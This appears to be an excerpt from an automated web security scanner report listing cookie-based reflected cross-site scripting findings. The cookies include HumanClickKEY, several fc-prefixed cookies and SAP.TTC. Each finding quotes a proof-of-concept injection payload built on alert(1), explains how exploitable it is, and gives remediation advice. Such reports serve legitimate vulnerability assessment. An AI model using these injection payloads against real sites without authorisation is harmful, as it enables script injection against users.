The value of the HumanClickKEY cookie is copied into the HTML document as plain text between tags. The payload ed0e7<script>alert(1)</script>c595c19c2b8 was submitted in the HumanClickKEY cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e8cc'-alert(1)-'d54652d0072 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcC.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb17'-alert(1)-'4c006192ad was submitted in the fcC.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df408'-alert(1)-'b17fbb93900 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcR.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2c31'-alert(1)-'85da044d06 was submitted in the fcR.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcC.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e610'-alert(1)-'74497c02a87 was submitted in the fcC.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcP.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93936'-alert(1)-'1110737f69 was submitted in the fcP.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fcR.648765de68b1d3c7 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e51'-alert(1)-'24e4270f356 was submitted in the fcR.648765de68b1d3c7 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the SAP.TTC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77350'-alert(1)-'2991cbf0eee was submitted in the SAP.TTC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.